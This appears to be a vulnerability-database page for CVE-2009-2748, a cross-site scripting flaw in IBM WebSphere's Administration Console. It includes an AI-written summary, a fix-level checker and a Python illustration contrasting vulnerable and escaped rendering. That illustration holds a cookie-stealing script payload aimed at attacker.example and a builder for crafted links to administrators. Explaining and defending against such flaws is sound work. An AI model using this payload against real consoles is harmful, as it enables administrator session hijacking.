CVE-2009-2748
Description
Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.29 and 7.1 before 7.0.0.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The Administrative Console in IBM WebSphere Application Server 6.1 before 6.1.0.29 and 7.0 before 7.0.0.7 is vulnerable to cross-site scripting via unspecified vectors.
Vulnerability
A cross-site scripting (XSS) vulnerability exists in the Administration Console of IBM WebSphere Application Server (WAS) 6.1 before fix pack 6.1.0.29 and 7.0 before fix pack 7.0.0.7. (The CVE description says "7.1", but the fix level and every 7.x CPE listed below are 7.0.x; read it as 7.0.) It allows remote attackers to inject arbitrary web script or HTML through unspecified vectors [1]. The affected component is the administrative interface, which is normally reachable only by authenticated users holding administrative roles, so the injected script runs in an administrator's browser rather than on the server.
Exploitation
An attacker needs network reach to the Administration Console and, in all likelihood, an authenticated administrator's cooperation, such as following a crafted link or visiting a page that submits the payload to the console while the administrator is logged in. The exact injection point is not detailed in the available references; IBM's fix, APAR PK99481, describes the issue only as "Administrative console might allow cross-site scripting" [1].
Impact
Successful exploitation runs attacker-supplied script in the authenticated administrator's browser, within the console's origin. From there the script can issue console requests with the administrator's privileges, read whatever the console displays, and, unless the session cookie is marked HttpOnly, read and exfiltrate it for session hijacking.
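The bug class the narrative describes, as an added illustration that is not WebSphere's code: the real injection point in the Administration Console is unpublished, so the handler, the 'filter' parameter, the console URL and the payload below are all invented. It contrasts a page that echoes a query parameter raw with the same page encoding the value for its HTML context, and builds the kind of link an attacker would send an administrator.

```python
"""Reflected XSS in a console page: the vulnerable rendering beside its hardened form.

Illustration only. The real injection point in the WebSphere Administration
Console is not public; the handler, the 'filter' parameter, the console URL
and the payload below are invented for this example.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed payload of the kind a crafted link would carry: it ships the
# victim's cookies to an attacker-controlled host.
PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(query: str) -> str:
    """Echo a request parameter straight into the HTML body (the bug class)."""
    flt = parse_qs(query).get("filter", [""])[0]
    return f"<html><body><h1>Applications</h1><p>Filter: {flt}</p></body></html>"


def render_hardened(query: str) -> str:
    """Same page, with the untrusted value encoded for the HTML context it lands in.

    html.escape(quote=True) turns < > & " ' into entities, so the value is inert
    both in text content and inside a double-quoted attribute.
    """
    flt = html.escape(parse_qs(query).get("filter", [""])[0], quote=True)
    return (
        "<html><body><h1>Applications</h1>"
        f'<p>Filter: {flt}</p><input name="filter" value="{flt}">'
        "</body></html>"
    )


def crafted_link(console_url: str, payload: str = PAYLOAD) -> str:
    """Build the link an attacker would send to an authenticated administrator."""
    return console_url + "?" + urlencode({"filter": payload})


def query_of(link: str) -> str:
    """The query string the console would receive when the link is followed."""
    return urlsplit(link).query


def executes_payload(page: str) -> bool:
    """Crude marker check: does a raw <script> tag survive into the response?"""
    return "<script>" in page


if __name__ == "__main__":
    # Hypothetical console URL; the real path is not something this page documents.
    q = query_of(crafted_link("https://dmgr.example:9043/ibm/console/apps"))
    print("vulnerable page runs the payload:", executes_payload(render_vulnerable(q)))
    print("hardened page runs the payload:  ", executes_payload(render_hardened(q)))
```

The hardened handler encodes once, at the point where the value is written into HTML; encoding for a different context (a JavaScript string, a URL) needs that context's own encoder, which is why "unspecified vectors" in an advisory is worth treating as "every place the console reflects input".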
Mitigation
IBM has released fix packs 6.1.0.29 for the 6.1 stream and 7.0.0.7 for the 7.0 stream; apply the fix pack for the installed stream, or a later one. The "7.1" in the CVE description is not a separate stream: the affected 7.x levels listed below are 7.0 through 7.0.0.6, all of which move to 7.0.0.7 or later. No workaround is provided in the available references [1]. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
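A check a practitioner would want before applying the mitigation above, as an added example rather than anything from the page's references: it classifies an installed WAS fix level against the two fixed levels on this page, per release stream, so that a patched 6.1.0.29 is not flagged by a naive comparison against 7.0.0.7. The 'Version <level>' line it parses is the shape assumed for <WAS_HOME>/bin/versionInfo.sh output; that format is an assumption, and the sample output is constructed.

```python
"""Classify an installed WebSphere Application Server fix level against the
affected ranges on this page: 6.1 before 6.1.0.29 and 7.0 before 7.0.0.7.

Added example. The fixed levels are taken from the page; the 'Version <level>'
line format assumed for versionInfo.sh output is an assumption, and the sample
output below is constructed.
"""
import re
from typing import List, Optional, Tuple

# Fixed level per release stream, keyed by the stream's major.minor prefix.
# The comparison must be done per stream: "version < 7.0.0.7" alone would flag
# every 6.1 install, patched or not, and "version < 6.1.0.29" alone would clear
# every unpatched 7.0 install.
FIXED_LEVELS = {
    (6, 1): (6, 1, 0, 29),
    (7, 0): (7, 0, 0, 7),
}

VERSION_LINE = re.compile(r"^\s*Version\s+(\d+(?:\.\d+)*)\s*$", re.MULTILINE)


def parse_level(text: str) -> Tuple[int, ...]:
    """'6.1.0.25' -> (6, 1, 0, 25); short forms such as '7.0' pad to four fields."""
    parts = text.strip().split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric level: {text!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (4 - len(nums))


def is_affected(level: str) -> Optional[bool]:
    """True if the level is below its stream's fix, False if at or above it,
    None if the stream (for example 8.0) is outside this CVE's scope."""
    v = parse_level(level)
    fixed = FIXED_LEVELS.get(v[:2])
    if fixed is None:
        return None
    return v < fixed


def levels_from_versioninfo(output: str) -> List[str]:
    """Pull every 'Version  a.b.c.d' line out of versionInfo output."""
    return VERSION_LINE.findall(output)


# Constructed sample in the shape assumed for <WAS_HOME>/bin/versionInfo.sh output.
SAMPLE_VERSIONINFO = """\
Installed Product
--------------------------------------------------------------------------------
Name                     IBM WebSphere Application Server - ND
Version                  6.1.0.25
ID                       ND
"""

if __name__ == "__main__":
    for lvl in levels_from_versioninfo(SAMPLE_VERSIONINFO):
        verdict = {True: "affected", False: "fixed", None: "out of scope"}[is_affected(lvl)]
        print(lvl, verdict)
```

Run it against the real tool's output by piping `versionInfo.sh` into the script; a None verdict means the install is on a stream this CVE does not cover, not that it is safe from other advisories.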
Affected products
24 CPE entries:
- cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.12:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.23:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.25:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.27:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.6:*:*:*:*:*:*:*
- Version range (no CPE): <6.1.0.29 or <7.0.0.7
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.